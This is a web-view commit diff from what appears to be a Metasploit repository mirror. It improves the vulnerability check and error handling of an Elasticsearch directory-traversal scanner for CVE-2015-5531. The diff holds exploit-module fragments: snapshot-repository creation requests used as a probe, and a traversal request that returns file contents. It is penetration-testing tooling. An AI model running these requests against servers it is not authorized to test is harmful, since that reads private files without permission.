adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

Merge pull request #21344 from adfoster-r7/fix-elasticsearch-traversal-check-support

Browse Source 
Fix elasticsearch traversal check support
This commit is contained in:
adfoster-r7
2026-04-21 15:57:26 +01:00
committed by GitHub
parent 97ab01cddd 81f1a7c86a
commit a918184416
2 changed files with 17 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files
lib/msf/core/auxiliary/multiple_target_hosts.rb
+3 -5
View File
@@ -17,12 +17,10 @@ module Auxiliary::MultipleTargetHosts
end
def check
return Exploit::CheckCode::Unsupported unless has_check?
nmod = replicant
begin
nmod.check_host(datastore['RHOST'])
rescue NoMethodError
Exploit::CheckCode::Unsupported
end
nmod.check_host(datastore['RHOST'])
end
end
modules/auxiliary/scanner/http/elasticsearch_traversal.rb
+14 -5
View File
@@ -54,17 +54,21 @@ class MetasploitModule < Msf::Auxiliary
'data' => '{"type":"fs","settings":{"location":"dsr"}}'
)
return Exploit::CheckCode::Unknown('Failed to connect to the target.') unless res1
res2 = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '_snapshot', 'pwnie'),
'data' => '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}'
)
return Exploit::CheckCode::Unknown('Failed to connect to the target.') unless res2
if res1.body.include?('true') && res2.body.include?('true')
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Appears('Successfully created snapshot repositories, suggesting the Snapshot API is vulnerable to CVE-2015-5531.')
end
Exploit::CheckCode::Safe
Exploit::CheckCode::Safe('Failed to create snapshot repositories.')
end
def read_file(file)
@@ -82,7 +86,12 @@ class MetasploitModule < Msf::Auxiliary
'uri' => travs
)
if res && res.code == 400
unless res
print_error("No response received from the target.")
return nil
end
if res.code == 400
return res.body
else
print_status("Server returned HTTP response code: #{res.code}")
@@ -95,8 +104,8 @@ class MetasploitModule < Msf::Auxiliary
vprint_status("Checking if it's a vulnerable ElasticSearch")
check_code = check_host(ip)
print_status("#{check_code.message}")
if check_host(ip) != Exploit::CheckCode::Appears
print_status(check_code.message)
unless check_code == Exploit::CheckCode::Appears
return
end